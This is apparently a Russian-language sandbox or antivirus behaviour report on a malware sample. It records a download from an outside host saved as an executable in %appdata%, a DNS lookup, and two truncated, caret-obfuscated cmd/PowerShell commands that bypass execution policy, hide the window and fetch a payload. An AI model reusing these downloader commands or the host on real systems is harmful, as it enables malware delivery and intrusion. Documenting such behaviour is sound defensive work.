Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWErSHe^lL^.E^X^E ^-exEcuTi^o^n^pOLiCY^ b^yPA^SS ^-nOpR^OF^I^LE -w^i^n^d^OwSt^y^lE hI^Dde^n (NeW-o^BjE^ct^ ^sys^teM.nE^T.W^Ebcl^ieN^T)^.dOwnlo^ADF^iL^E(^'http://smoeroota.top...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "poWErSHe^lL^.E^X^E ^-exEcuTi^o^n^pOLiCY^ b^yPA^SS ^-nOpR^OF^I^LE -w^i^n^d^OwSt^y^lE hI^Dde^n (NeW-o^BjE^ct^ ^sys^teM.nE^T.W^Ebcl^ieN^T)^.dOwnlo^ADF^iL^E(^'http://smoeroota.top...' (со скрытым окном)